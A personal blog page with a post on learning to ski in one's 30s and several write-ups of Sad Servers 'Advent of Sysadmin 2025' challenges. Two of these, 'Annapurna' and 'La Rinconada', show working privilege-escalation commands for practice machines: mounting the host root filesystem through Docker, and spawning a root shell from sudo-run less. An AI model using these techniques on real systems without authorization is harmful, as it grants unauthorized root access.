Jérémie Robi | jrb.nz

Learning to ski in my 30s

2026-02-03T00:00:00Z

Work in progress ⛷️

I'm taking some notes about my experience learning alpine skiing these past winters.

How it started

I wasn't one of those kids that learned to ski in childhood. I did do cross-country skiing with my parents, but I remember that I found it a bit boring at the time.

At some point, I did try snowboarding, but I can't remember it very much. I must have felt overwhelmed by it somehow, because I didn't do more of it.

Fast forward to my 30s, and living in Montreal, I found some renewed interest in cross-country skiing. Particularly the backcountry flavor (also called backcountry nordic skiing - confusing name if you ask me). The COVID-19 pandemic also kinda forced me to find a winter sport to get outside more, and I slowly developed a love for it.

A few things helped during the process:

I got myself some great Asnes Nansen Waxless. Great skis that mostly fit in groomed tracks, but are also great in deep snow. Waxless, meaning they have a grip zone built into the pocket. They also can be fitted with skins, allowing to climb hills easily.
I discovered / started looking for spots where to ski on Open Ski Map
I also discovered the awesome blog of Barclay Fortin

At some point, wanting to get better at downhill in my cross-country skiing, I learned about the telemark technique. A few weeks later, I booked a telemark course.

Little did I know, alpine skiing skills were expected in this telemark course. I was the only one in the group that hadn't learned alpine skiing beforehand.

It was a very humbling experience. But three things happened:

I felt bad for being so terrible at skiing. I was clearly slowing down the group.
I somehow managed to learn the basics and do alpine skiing for the first time in my life
I had the most fun in a long time

Even if I didn't technically learn the telemark technique, I was hooked to alpine skiing. I wanted more of it.

Two weeks later, I went back skiing at a resort with a friend.

How it's going

Since then, I went deep and kept wanting more of it. It truly felt like finding a new love for a sport.

Bought some gear: skis, boots, gloves, poles.
Bought an evening seasonal pass at a mountain close to home, allowing me to go skiing after work between 17:00 and 22:00.
Took some private lessons at the same mountain.

Tips

From Youtube videos to official ski lessons, here's some tips I gleaned along the way:

Relax. This is a chill sport. Don't be so tense.
Look where you're going (it helps with turning).
Use your legs to turn, not your torso.
Lean forward. Yes, more.
Bring your knees inside when turning so that your skis can bite in the snow.
Relax some more. You'll be fine.

Annapurna - Advent of Sysadmin 2025

2025-12-07T00:00:00Z

This is part of Sad Servers' Advent of Sysadmin 2025 series.

I'm doing each challenge every day and I'm publishing a quick write up for each one every day.

Spoiler alert! This gives the solution to the challenge. If you want to do it on your own, stop reading.

Challenge details

Scenario: "Annapurna": High privileges

Level: Medium

Type: Hack

Tags: hack advent2025

Access: Email

Description: You are logged in as the user admin.

You have been tasked with auditing the admin user privileges in this server; "admin" should not have sudo (root) access.

Exploit this server so you as the admin user can read the file /root/mysecret.txt Save the content of /root/mysecret.txt to the file /home/admin/mysolution.txt , for example: echo "secret" > ~/mysolution.txt

Root (sudo) Access: False

Test: Running md5sum /home/admin/mysolution.txt returns . (We also accept the md5sum of the same file without a newline at the end).

The "Check My Solution" button runs the script /home/admin/agent/check.sh, which you can see and execute.

Time to Solve: 20 minutes.

This is the second one in the hack category! I love those.

Alas, in this one, the user we get logged into doesn't have sudo access at all.

admin@i-0adfc7a1f5cd64cfb:~$ sudo -l
Matching Defaults entries for admin on i-0adfc7a1f5cd64cfb:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    use_pty

User admin may run the following commands on i-0adfc7a1f5cd64cfb:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: /sbin/shutdown

But the user has docker access!

$ id
<output not copied>
$ docker --version
<output not copied>

Docker daemon attack surface | Docker Docs

Since the user is part of the docker group, we can run docker without sudo. And that allows us to mount any part of the host filesystem into the docker container and gain access to it.

First of all, only trusted users should be allowed to control your Docker daemon. This is a direct consequence of some powerful Docker features. Specifically, Docker allows you to share a directory between the Docker host and a guest container; and it allows you to do so without limiting the access rights of the container. This means that you can start a container where the /host directory is the / directory on your host; and the container can alter your host filesystem without any restriction. This is similar to how virtualization systems allow filesystem resource sharing. Nothing prevents you from sharing your root filesystem (or even your root block device) with a virtual machine. - https://docs.docker.com/engine/security/#docker-daemon-attack-surface

GTFOBins also mentions this: docker | GTFOBins

It is then simply a matter of running a container that will output the secret file to the required destination. A quick one-liner like this works:

docker run --mount \
type=volume,src=/,dst=/host \
alpine cat /host/root/mysecret.txt > /host/home/admin/mysolution.txt

And one more! 🚩

Hamburg - Advent of Sysadmin 2025

2025-12-06T00:00:00Z

This is part of Sad Servers' Advent of Sysadmin 2025 series.

I'm doing each challenge every day and I'm publishing a quick write up for each one every day.

Spoiler alert! This gives the solution to the challenge. If you want to do it on your own, stop reading.

Challenge details

Scenario: "Hamburg": Find the AWS EC2 volume

Level: Easy

Description: We have a lot of AWS EC2 instances and EBS volumes, the description of which volumes we have saved to a file with: aws ec2 describe-volumes > aws-volumes.json. One of the volumes attached to an ec2 instance contains important data and we need to identify which instance is attached to (its ID), but we only remember these characteristics: gp3, created before 31/09/2025 , Size < 64 , Iops < 1500, Throughput > 300.

Find the correct instance and put its "InstanceId" into the ~/mysolution file, e.g.: echo "i-00000000000000000" > ~/mysolution

Test: Running md5sum /home/admin/mysolution returns e7e34463823bf7e39358bf6bb24336d8 (we also accept the file without a new line at the end).

The "Check My Solution" button runs the script /home/admin/agent/check.sh, which you can see and execute.

Time to Solve: 30 minutes.

OS: Debian 13

Root (sudo) Access: Yes

Just by reading the challenge description, I knew I had to work with jq to find the answer.

Before launching the challenge, I started by reading the output structure of the AWS CLI describe-volumes command here: describe-volumes — AWS CLI 2.32.11 Command Reference

I ended up preparing my jq filter like this to match the search criteria:

VolumeType == gp3
CreateTime < 2025-09-31T00:00:002
Size < 64
Iops < 1500
Throughput > 300

jq '.Volumes[] | select(.VolumeType == "gp3" and .Size < 64 and .Iops < 1500 and .Throughput > 300 and .CreateTime < "2025-09-31T00:00:002")'

cat aws-volumes.json | jq '.Volumes[] | select(.VolumeType == "gp3" and .Size < 64 and .Iops < 1500 and .Throughput > 300 and .CreateTime < "2025-09-31T00:00:002")'
{
  "AvailabilityZoneId": "use2-az2",
  "Iops": 1000,
  "VolumeType": "gp3",
  "MultiAttachEnabled": false,
  "Throughput": 500,
  "Operator": {
    "Managed": false
  },
  "VolumeId": "vol-29d115ef9c3944f29",
  "Size": 8,
  "SnapshotId": "snap-4d14b6dc50854a9cb",
  "AvailabilityZone": "us-east-2c",
  "State": "in-use",
  "CreateTime": "2025-09-29T16:43:18.004823Z",
  "Attachments": [
    {
      "DeleteOnTermination": true,
      "VolumeId": "vol-29d115ef9c3944f29",
      "InstanceId": "i-371822c092b2470da",
      "Device": "/dev/xvdc",
      "State": "attached",
      "AttachTime": "2025-09-29T17:41:18.004823Z"
    }
  ],
  "Encrypted": false
}
{
  "AvailabilityZoneId": "use2-az3",
  "Iops": 1000,
  "VolumeType": "gp3",
  "MultiAttachEnabled": false,
  "Throughput": 500,
  "Operator": {
    "Managed": false
  },
  "VolumeId": "vol-99646e602c6e4b92a",
  "Size": 16,
  "SnapshotId": "snap-27b0fb199d294889b",
  "AvailabilityZone": "us-east-2a",
  "State": "available",
  "CreateTime": "2025-09-29T01:21:18.004823Z",
  "Attachments": [],
  "Encrypted": false
}

I confirmed this command was working as expected. And then, I had to select the attachment instance ID to get the answer:

cat aws-volumes.json | jq '.Volumes[] | select(.VolumeType == "gp3" and .Size < 64 and .Iops < 1500 and .Throughput > 300 and .CreateTime < "2025-09-31T00:00:002") | .Attachments[].InstanceId'

Redirect that into the file mysolution with the --raw-output argument for jq. And that's it!

cat aws-volumes.json | jq --raw-output '.Volumes[] | select(.VolumeType == "gp3" and .Size < 64 and .Iops < 1500 and .Throughput > 300 and .CreateTime < "2025-09-31T00:00:002") | .Attachments[].InstanceId' > mysolution

A quick and easy one! 🚩

La Rinconada - Advent of Sysadmin 2025

2025-12-05T00:00:00Z

This is part of Sad Servers' Advent of Sysadmin 2025 series.

I'm doing each challenge every day and I'm publishing a quick write up for each one every day.

Spoiler alert! This gives the solution to the challenge. If you want to do it on your own, stop reading.

Challenge details

Scenario: "La Rinconada": Elevating privileges

Level: Medium

Type: Hack

Tags: hack advent2025

Access: Email

Description: You are logged in as the user "admin" without general "sudo" privileges. The system administrator has granted you limited "sudo" access; this was intended to allow you to read log files.

Your mission is to find a way to exploit this limited sudo permission to gain a full root shell and read the secret file at /root/secret.txt Copy the content of /root/secret.txt into the /home/admin/solution.txt file, for example: cat /root/secret.txt > /home/admin/solution.txt (the "admin" user must be able to read the file).

Root (sudo) Access: False

Test: As the user "admin", md5sum /home/admin/solution.txt returns 52a55258e4d530489ffe0cc4cf02030c (we also accept the hash of the same secret string without an ending newline).

The "Check My Solution" button runs the script /home/admin/agent/check.sh, which you can see and execute.

Time to Solve: 15 minutes.

Cool little challenge to learn how to break out of a restricted shell when you have limited sudo access.

Start by listing what sudo access our user has:

admin@i-0adfc7a1f5cd64cfb:~$ whoami
admin

admin@i-0adfc7a1f5cd64cfb:~$ sudo -l
Matching Defaults entries for admin on i-0adfc7a1f5cd64cfb:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    use_pty

User admin may run the following commands on i-0adfc7a1f5cd64cfb:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: /sbin/shutdown
    (root) NOPASSWD: /usr/bin/less /var/log/*

The challenge description hinted at the fact that we could read some logs. As shown by the sudo -l command, we can use less to open files in /var/log/* as root without any password.

less is a pager that displays file content in a terminal window. Its commands are based on vi and vim. But this is where it gets interesting: while reading a file in less, you can invoke shell commands just like you would in vi. less spawns a shell to run whatever command you pass in. Since we're running less as root via sudo, any spawned shell inherits those root privileges.

less(1) - Linux manual page

That means we can get a root shell from within less.

sudo less /var/log/dpkg.log # file will open in less, showing first lines

!whoami # type this once you're in less

root

!done (press RETURN) # pressing return to go back to less

!/bin/bash # type this to get an interactive shell as root

We can actually run the command from the challenge description directly from less. No need to enter a sub-shell:

sudo less /var/log/dpkg.log

!cat /root/secret.txt > /home/admin/solution.txt

And that's it. We escaped the limited shell and got the secret. 🚩

Here's some great resources about escaping restricted shells:

Woluwe - Advent of Sysadmin 2025

2025-12-04T00:00:00Z

This is part of Sad Servers' Advent of Sysadmin 2025 series.

I'm doing each challenge every day and I'm publishing a quick write up for each one every day.

Spoiler alert! This gives the solution to the challenge. If you want to do it on your own, stop reading.

Challenge details

Scenario: "Woluwe": Too many images

Level: Medium

Description: A pipeline created a lot of Docker images locally for a web app. All these images except for one contain a typo introduced by a developer: there's an incorrect image instruction to pipe "HelloWorld" to "index.htmlz" instead of using the correct "index.html" Find which image doesn't have the typo (and uses the correct "index.html"), tag this correct image as "prod" and then deploy it with docker run -d --name prod -p 3000:3000 prod so it responds correctly to HTTP requests on port :3000 instead of "404 Not Found".

Test: curl http://localhost:3000 should respond with HelloWorld;529

The "Check My Solution" button runs the script /home/admin/agent/check.sh, which you can see and execute.

Time to Solve: 15 minutes.

OS: Debian 13

Root (sudo) Access: Yes

There's a total of 102 images that have been built on this server.

We need to inspect/grep the content of the build layers to find the correct image ID that has the index.html file.

We can use docker history to look at the build steps of an image:

admin@i-0bb15e2e2e010d1f8:~$ docker history 3233cb6d5327
IMAGE          CREATED       CREATED BY                                      SIZE      COMMENT
3233cb6d5327   9 days ago    RUN |1 HW=529 /bin/sh -c head -c 1m /dev/ura…   1.05MB    buildkit.dockerfile.v0
<missing>      9 days ago    RUN |1 HW=529 /bin/sh -c echo "HelloWorld;$H…   15B       buildkit.dockerfile.v0
<missing>      9 days ago    ARG HW=529                                      0B        buildkit.dockerfile.v0
<missing>      5 weeks ago   CMD ["busybox" "httpd" "-f" "-v" "-p" "3000"]   0B        buildkit.dockerfile.v0
<missing>      5 weeks ago   WORKDIR /home/static                            0B        buildkit.dockerfile.v0
<missing>      5 weeks ago   USER static                                     0B        buildkit.dockerfile.v0
<missing>      5 weeks ago   RUN /bin/sh -c adduser -D static # buildkit     1.66kB    buildkit.dockerfile.v0
<missing>      5 weeks ago   EXPOSE &{[{{3 0} {3 0}}] 0xc000579b40}          0B        buildkit.dockerfile.v0
<missing>      3 years ago   BusyBox 1.35.0 (glibc), Debian 12               4.27MB

But we need the --no-trunc flag to get the full layer command that was used.

Let's look at an example with the typo to see what we're looking for:

admin@i-0bb15e2e2e010d1f8:~$ docker history --no-trunc 3233cb6d5327 | grep -E "index\.html"
<missing>      9 days ago    RUN |1 HW=529 /bin/sh -c echo "HelloWorld;$HW" > index.htmlz # buildkit     15B       buildkit.dockerfile.v0

See the typo? index.htmlz instead of index.html.

So it's simple enough:

Loop over the docker images
For each one, print the docker history
Grep exclusively for the index.html file (-w flag)
Print the id of the winning image

admin@i-0bb15e2e2e010d1f8:~$ for i in $(docker image ls -q); do docker history --no-trunc $i | grep -w "index.html" && echo "Found image id $i"; done
<missing>                                                                 9 days ago    RUN |1 HW=529 /bin/sh -c echo "HelloWorld;$HW" > index.html # buildkit     15B       buildkit.dockerfile.v0

Found image id 3f8befa65f01

Then tag and run the image:

admin@i-0bb15e2e2e010d1f8:~$ docker tag 3f8befa65f01 prod

admin@i-0bb15e2e2e010d1f8:~$ docker run -d --name prod -p 3000:3000 prod
f52854c96451c2d3131202bfe4ca0a7b8ac9b20dea528f7642edb26e216ee17c

How simple is that! This one felt way easier... 🚩

Kortenberg - Advent of Sysadmin 2025

2025-12-03T00:00:00Z

This is part of Sad Servers' Advent of Sysadmin 2025 series.

I'm doing each challenge every day and I'm publishing a quick write up for each one every day.

Spoiler alert! This gives the solution to the challenge. If you want to do it on your own, stop reading.

Challenge details

Scenario: "Kortenberg": Can't touch this!

Level: Easy

Type: Fix

Tags:

Access: Email

Description: Is "All I want for Christmas is you" already everywhere?. A bit unrelated, someone messed up the permissions in this server, the admin user can't list new directories and can't write into new files. Fix the issue. NOTE: Besides solving the problem in your current admin shell session, you need to fix it permanently, as in a new login shell for user "admin" (like the one initiated by the scenario checker) should have the problem fixed as well.

Root (sudo) Access: True

Test: The admin user in a separate Bash login session should be able to create a new directory in your /home/admin directory, as well as being able to create a file into this new directory and add text into the new file.

The "Check My Solution" button runs the script /home/admin/agent/check.sh, which you can see and execute.

Time to Solve: 15 minutes.

Just like I started the last one, let's see what we know just by reading the instructions:

Permissions are messed up
The admin user can't list/create new files/directories

Ok. Let's poke around. Creating files and folders, we get the wrong permissions:

admin@i-038be5ca7a3896dec:~$ mkdir testdir
admin@i-038be5ca7a3896dec:~$ touch testfile
admin@i-038be5ca7a3896dec:~$ ls -lah
total 40K
drwx------ 6 admin admin 4.0K Dec  4 14:42 .
drwxr-xr-x 3 root  root  4.0K Sep  7 16:29 ..
[...]
d--------- 2 admin admin 4.0K Dec  4 14:42 testdir
---------- 1 admin admin    0 Dec  4 14:42 testfile

This is an issue with umask!

umask(2) - Linux manual page

We can see the umask of the running process, which is our bash session:

admin@i-038be5ca7a3896dec:~$ ps
    PID TTY          TIME CMD
   1120 pts/0    00:00:00 bash
   1145 pts/0    00:00:00 ps
admin@i-038be5ca7a3896dec:~$ echo $$ # Get PID of current process
1120
admin@i-038be5ca7a3896dec:~$ grep '^Umask:' /proc/$$/status
Umask:  0777

But where is that set?

The /etc/profile file sets the umask to 777, which is no permission at all:

admin@i-038be5ca7a3896dec:~$ tail /etc/profile

if [ -d /etc/profile.d ]; then
  for i in $(run-parts --list --regex '^[a-zA-Z0-9_][a-zA-Z0-9._-]*\.sh$' /etc/profile.d); do
    if [ -r $i ]; then
      . $i
    fi
  done
  unset i
fi
umask 777

We need to fix that umask value, at least for the admin user. We could simply call umask <mask>, but that would only work for our current session and not, like it's explained in the instructions, in a new shell/login for the admin user.

What we can do is change the umask in a file loaded during a login session, like ~/.profile.

But what umask value do we need? The usual default is 022, which gives 644 for files and 755 for directories, according to this umask table

echo "umask 022" >> ~/.profile

And voilà! 🚩 A new interactive login shell will load the admin's profile file and get the right permissions.

Marseille - Advent of Sysadmin 2025

2025-12-02T00:00:00Z

This is part of Sad Servers' Advent of Sysadmin 2025 series.

I'm doing each challenge every day and I'm publishing a quick write up for each one every day.

Spoiler alert! This gives the solution to the challenge. If you want to do it on your own, stop reading.

Challenge details

Scenario: "Marseille": Rocky security

Level: Medium

Type: Fix

Tags: apache php advent2025

Access: Email

Description: As the Christmas shopping season approaches, the security team has asked Mary and John to implement more security measures. Unfortunately, this time they have broken the LAMP stack; the frontend is unable get an answer from upstream, thus they need your help again to fix it.

The application should be able to serve the content from the webserver.

Note for Pro users: direct SSH access is not available (yet) for this scenario.

Root (sudo) Access: True

Test: curl localhost | head -n1 returns SadServers - LAMP Stack

The "Check My Solution" button runs the script /home/admin/agent/check.sh, which you can see and execute.

Time to Solve: 15 minutes.

This one took me a bit more time than usual. Let's start from the beginning. What do we know?

We have a frontend and some kind of upstream server
It's a LAMP stack - probably apache and php from looking at the tags
The name of the challenge points toward something about the security on Rocky linux

Let's see what's running on the machine:

sudo netstat -anp | grep -E "php|httpd"
tcp        0      0 127.0.0.1:9000          0.0.0.0:*               LISTEN      934/php-fpm: master
tcp6       0      0 :::80                   :::*                    LISTEN      966/httpd
unix  3      [ ]         STREAM     CONNECTED     9946     966/httpd
unix  3      [ ]         STREAM     CONNECTED     10037    934/php-fpm: master
unix  3      [ ]         STREAM     CONNECTED     10036    934/php-fpm: master
unix  2      [ ACC ]     STREAM     LISTENING     10250    993/httpd            /etc/httpd/run/cgisock.966
unix  3      [ ]         STREAM     CONNECTED     9085     934/php-fpm: master
unix  2      [ ]         DGRAM                    10249    966/httpd

So as we see here, we have apache and php-fpm running. apache is listening on port 80 and php-fpm on port 9000.

They are both running as systemd services:

[admin@i-0e0450878ee67b460 ~]$ ps -eo pid,comm,cgroup | grep -E "php|httpd"
    934 php-fpm         0::/system.slice/php-fpm.service
    966 httpd           0::/system.slice/httpd.service
    988 php-fpm         0::/system.slice/php-fpm.service
    989 php-fpm         0::/system.slice/php-fpm.service
    990 php-fpm         0::/system.slice/php-fpm.service
    991 php-fpm         0::/system.slice/php-fpm.service
    992 php-fpm         0::/system.slice/php-fpm.service
    993 httpd           0::/system.slice/httpd.service
    994 httpd           0::/system.slice/httpd.service
    995 httpd           0::/system.slice/httpd.service
   1028 httpd           0::/system.slice/httpd.service

What do we get when poking those services?

[admin@i-0e0450878ee67b460 ~]$ curl -v localhost
* Host localhost:80 was resolved.
* IPv6: ::1
* IPv4: 127.0.0.1
*   Trying [::1]:80...
* connect to ::1 port 80 from ::1 port 45164 failed: Connection refused
*   Trying 127.0.0.1:80...
* connect to 127.0.0.1 port 80 from 127.0.0.1 port 48662 failed: Connection refused
* Failed to connect to localhost port 80 after 0 ms: Could not connect to server
* closing connection #0
curl: (7) Failed to connect to localhost port 80 after 0 ms: Could not connect to server

[admin@i-0e0450878ee67b460 ~]$ curl -v localhost:9000
* Host localhost:9000 was resolved.
* IPv6: ::1
* IPv4: 127.0.0.1
*   Trying [::1]:9000...
* connect to ::1 port 9000 from ::1 port 43394 failed: Connection refused
*   Trying 127.0.0.1:9000...
* Connected to localhost (127.0.0.1) port 9000
* using HTTP/1.x
> GET / HTTP/1.1
> Host: localhost:9000
> User-Agent: curl/8.12.1
> Accept: */*
>
* Request completely sent off
* Recv failure: Connection reset by peer
* closing connection #0
curl: (56) Recv failure: Connection reset by peer

Both returns a connection refused. Let's look at the configuration files.

Going through /etc/, I found the defaults config file for apache:

[admin@i-0e0450878ee67b460 ~]$ ls -lah /etc/httpd/conf.d/
total 24K
drwxr-xr-x. 2 root root  122 Dec  2 02:52 .
drwxr-xr-x. 5 root root  105 Dec  2 02:52 ..
-rw-r--r--. 1 root root  157 Dec  2 02:52 000-default.conf
-rw-r--r--. 1 root root 2.9K Aug 16 00:00 autoindex.conf
-rw-r--r--. 1 root root 1.6K Apr  9  2025 php.conf
-rw-r--r--. 1 root root  400 Aug 16 00:00 README
-rw-r--r--. 1 root root 1.3K Aug 16 00:00 userdir.conf
-rw-r--r--. 1 root root  653 Aug 16 00:00 welcome.conf

[admin@i-0e0450878ee67b460 ~]$ cat /etc/httpd/conf.d/000-default.conf
<VirtualHost *:80>
    DocumentRoot /var/www/html

    <FilesMatch \.php$>
        SetHandler "proxy:fcgi://127.0.0.1:9001"
    </FilesMatch>
</VirtualHost>

There, I spotted the issue with the port: 9001 is not the right php port! It should be 9000.

Let me fix it:

vi /etc/httpd/conf.d/000-default.conf
# Change this line:
#   SetHandler "proxy:fcgi://127.0.0.1:9001"
# To:
#   SetHandler "proxy:fcgi://127.0.0.1:9000"

# Restart apache for changes to take effect
sudo systemctl restart httpd

Then, the frontend was returning something else!

[admin@i-0e0450878ee67b460 ~]$ curl -v localhost
* Host localhost:80 was resolved.
* IPv6: ::1
* IPv4: 127.0.0.1
*   Trying [::1]:80...
* Connected to localhost (::1) port 80
* using HTTP/1.x
> GET / HTTP/1.1
> Host: localhost
> User-Agent: curl/8.12.1
> Accept: */*
>
* Request completely sent off
< HTTP/1.1 503 Service Unavailable
< Date: Tue, 09 Dec 2025 21:02:54 GMT
< Server: Apache/2.4.63 (Rocky Linux)
< Content-Length: 299
< Connection: close
< Content-Type: text/html; charset=iso-8859-1
<
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>503 Service Unavailable</title>
</head><body>
<h1>Service Unavailable</h1>
<p>The server is temporarily unable to service your
request due to maintenance downtime or capacity
problems. Please try again later.</p>
</body></html>
* shutting down connection #0

Interestingly, we actually get a response back. Still, a 503, but better than what we had when we started!

This is where it took me some digging to find the next issue. I was not super familiar with Rocky linux. I ended up reading a lot on SELinux Security - Documentation

I grep'ed some logs in /var/log/audit/audit.log, looking for anything related to httpd.

[admin@i-0e0450878ee67b460 ~]$ grep "httpd" /var/log/audit/audit.log
type=AVC msg=audit(1765314669.764:122): avc:  denied  { name_connect } for  pid=1001 comm="httpd" dest=9000 scontext=system_u:system_r:httpd_t:s0 tcontext=system_u:object_r:http_port_t:s0 tclass=tcp_socket permissive=0
type=SYSCALL msg=audit(1765314669.764:122): arch=c000003e syscall=42 success=no exit=-13 a0=e a1=7f4ddc011e68 a2=10 a3=7f4dea7e394c items=0 ppid=970 pid=1001 auid=4294967295 uid=48 gid=48 euid=48 suid=48 fsuid=48 egid=48 sgid=48 fsgid=48 tty=(none) ses=4294967295 comm="httpd" exe="/usr/sbin/httpd" subj=system_u:system_r:httpd_t:s0 key=(null)ARCH=x86_64 SYSCALL=connect AUID="unset" UID="apache" GID="apache" EUID="apache" SUID="apache" FSUID="apache" EGID="apache" SGID="apache" FSGID="apache"
type=AVC msg=audit(1765314670.245:123): avc:  denied  { name_connect } for  pid=1000 comm="httpd" dest=9000 scontext=system_u:system_r:httpd_t:s0 tcontext=system_u:object_r:http_port_t:s0 tclass=tcp_socket permissive=0
type=SYSCALL msg=audit(1765314670.245:123): arch=c000003e syscall=42 success=no exit=-13 a0=e a1=7f4dd8011e68 a2=10 a3=7f4de1bfd94c items=0 ppid=970 pid=1000 auid=4294967295 uid=48 gid=48 euid=48 suid=48 fsuid=48 egid=48 sgid=48 fsgid=48 tty=(none) ses=4294967295 comm="httpd" exe="/usr/sbin/httpd" subj=system_u:system_r:httpd_t:s0 key=(null)ARCH=x86_64 SYSCALL=connect AUID="unset" UID="apache" GID="apache" EUID="apache" SUID="apache" FSUID="apache" EGID="apache" SGID="apache" FSGID="apache"

This was very hard to read and didn't give me much info. Basically, httpd was denied access to port 9000. But why?

But then I learned about audit2why and the magic happened:

[admin@i-0e0450878ee67b460 ~]$ sudo grep "httpd" /var/log/audit/audit.log | grep "avc" | tail -1 | audit2why
type=AVC msg=audit(1765319188.541:316): avc:  denied  { name_connect } for  pid=1041 comm="httpd" dest=9000 scontext=system_u:system_r:httpd_t:s0 tcontext=system_u:object_r:http_port_t:s0 tclass=tcp_socket permissive=0

        Was caused by:
        One of the following booleans was set incorrectly.
        Description:
        Allow httpd to can network connect

        Allow access by executing:
        # setsebool -P httpd_can_network_connect 1
        Description:
        Allow httpd to graceful shutdown

        Allow access by executing:
        # setsebool -P httpd_graceful_shutdown 1
        Description:
        Allow httpd to can network relay

        Allow access by executing:
        # setsebool -P httpd_can_network_relay 1
        Description:
        Allow nis to enabled

        Allow access by executing:
        # setsebool -P nis_enabled 1

Now this is way more readable! Reading on the first boolean, httpd_can_network_connect, I felt like I had a high chance of success: 13.3. Booleans | SELinux User's and Administrator's Guide | Red Hat Enterprise Linux | 7 | Red Hat Documentation

httpd_can_network_connect When disabled, this Boolean prevents HTTP scripts and modules from initiating a connection to a network or remote port. Enable this Boolean to allow this access.

Since we have httpd getting blocked when doing a request, that seems to match our case.

Let's try it:

[admin@i-0e0450878ee67b460 ~]$ sudo setsebool -P httpd_can_network_connect 1
[admin@i-0e0450878ee67b460 ~]$ curl localhost | head -n1
[...]
SadServers - LAMP Stack

And success! 🚩

Auderghem - Advent of Sysadmin 2025

2025-12-01T00:00:00Z

This is part of Sad Servers' Advent of Sysadmin 2025 series.

I'm doing each challenge every day and I'm publishing a quick write up for each one every day.

Spoiler alert! This gives the solution to the challenge. If you want to do it on your own, stop reading.

Challenge details

Scenario: "Auderghem": Containers miscommunication

Level: Medium

Type: Fix

Tags: nginx

Access: Email

Description: There is an nginx Docker container that listens on port 80, the purpose of which is to redirect the traffic to two other containers statichtml1 and statichtml2 but this redirection is not working. Fix the problem.

IMPORTANT. You can restart all containers, but don't stop or remove them.

Root (sudo) Access: True

Test: The nginx container must redirect the traffic to the statichtml1 and statichtml2 containers:

curl http://localhost returns the Welcome to nginx default page curl http://localhost/1 returns HelloWorld;1 curl http://localhost/2 returns HelloWorld;2

The "Check My Solution" button runs the script /home/admin/agent/check.sh, which you can see and execute.

Time to Solve: 15 minutes.

First of all, we need to know what we're working with. Let's explore the errors and the docker containers running:

curl -v http://localhost/1
* Host localhost:80 was resolved.
* IPv6: ::1
* IPv4: 127.0.0.1
*   Trying [::1]:80...
* Connected to localhost (::1) port 80
* using HTTP/1.x
> GET /1 HTTP/1.1
> Host: localhost
> User-Agent: curl/8.14.1
> Accept: */*
>
* Request completely sent off
< HTTP/1.1 504 Gateway Time-out
< Server: nginx/1.29.3
< Date: Sun, 07 Dec 2025 23:24:22 GMT
< Content-Type: text/html
< Content-Length: 167
< Connection: keep-alive
<
<html>
<head><title>504 Gateway Time-out</title></head>
<body>
<center><h1>504 Gateway Time-out</h1></center>
<hr><center>nginx/1.29.3</center>
</body>
</html>
* Connection #0 to host localhost left intact

Basic exploratory commands:

admin@i-03fc55a1924a48445:~$ whoami
admin

admin@i-03fc55a1924a48445:~$ id
uid=1000(admin) gid=1000(admin) groups=1000(admin),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),989(docker)

admin@i-03fc55a1924a48445:~$ pwd
/home/admin

admin@i-03fc55a1924a48445:~$ ls -lah
total 36K
drwx------ 6 admin admin 4.0K Dec  1 16:42 .
drwxr-xr-x 3 root  root  4.0K Sep  7 16:29 ..
drwx------ 3 admin admin 4.0K Sep  7 16:31 .ansible
-rw-r--r-- 1 admin admin  220 Jul 30 19:28 .bash_logout
-rw-r--r-- 1 admin admin 3.5K Jul 30 19:28 .bashrc
-rw-r--r-- 1 admin admin  807 Jul 30 19:28 .profile
drwx------ 2 admin admin 4.0K Sep  7 16:29 .ssh
-rw-r--r-- 1 admin admin    0 Sep  7 16:31 .sudo_as_admin_successful
drwxrwxrwx 2 admin admin 4.0K Dec  1 16:42 agent
drwxrwxrwx 2 admin admin 4.0K Dec  1 16:42 app

admin@i-03fc55a1924a48445:~$ ls -lah app/
total 12K
drwxrwxrwx 2 admin admin 4.0K Dec  1 16:42 .
drwx------ 6 admin admin 4.0K Dec  1 16:42 ..
-rw-rw-r-- 1 admin admin  638 Dec  7 23:46 default.conf

admin@i-03fc55a1924a48445:~$ cat app/default.conf
    server {
        listen 80;
        location / {
            root   /usr/share/nginx/html;
            index  index.html index.htm;
        }
        location /1 {
            rewrite ^ / break;
            proxy_pass http://statichtml1.sadservers.local;
            proxy_connect_timeout   2s;
            proxy_send_timeout      2s;
            proxy_read_timeout      2s;
        }
        location /2 {
            rewrite ^ / break;
            proxy_pass http://statichtml2.sadservers.local;
            proxy_connect_timeout   2s;
            proxy_send_timeout      2s;
            proxy_read_timeout      2s;
        }
    }

We see that we have a nginx config in app. It's probably mounted in the nginx container:

docker ps --format "{{ .ID }} {{ .Names }} {{ json .Networks }} {{ .Mounts }}" --no-trunc
89bf0e394bb9 statichtml2 "static-net"
1f96c1876662 statichtml1 "static-net"
7440094fc321 nginx "bridge" /home/admin/app/default.conf

Docker containers:

docker ps
CONTAINER ID   IMAGE          COMMAND                  CREATED      STATUS          PORTS                                 NAMES
89bf0e394bb9   statichtml:2   "busybox httpd -f -v…"   6 days ago   Up 20 seconds   3000/tcp                              statichtml2
1f96c1876662   statichtml:1   "busybox httpd -f -v…"   6 days ago   Up 20 seconds   3000/tcp                              statichtml1
7440094fc321   nginx          "/docker-entrypoint.…"   6 days ago   Up 20 seconds   0.0.0.0:80->80/tcp, [::]:80->80/tcp   nginx

docker network ls
NETWORK ID     NAME         DRIVER    SCOPE
9d257323d6f9   bridge       bridge    local
a7250a90f896   host         host      local
b08d312e9d16   none         null      local
cc3e04c023f1   static-net   bridge    local

Oh, we have more than one network. Interesting. Let's look into it:

docker ps --format "{{ .ID }} {{ .Names }} {{ json .Networks }}"
89bf0e394bb9 statichtml2 "static-net"
1f96c1876662 statichtml1 "static-net"
7440094fc321 nginx "bridge"

First issue is here! nginx container is not on the same network than the destination containers. Basic routing issue.

If nginx is a proxy to the other containers, it needs to be on the same network. Otherwise, no traffic will be able to reach the destination containers.

Let's connect the nginx proxy to the static-net network:

docker network connect static-net 7440094fc321
# And confirm it's connected
docker ps --format '{{ .ID }} {{ .Names }} {{ json .Networks }}'
89bf0e394bb9 statichtml2 "static-net"
1f96c1876662 statichtml1 "static-net"
7440094fc321 nginx "bridge,static-net"

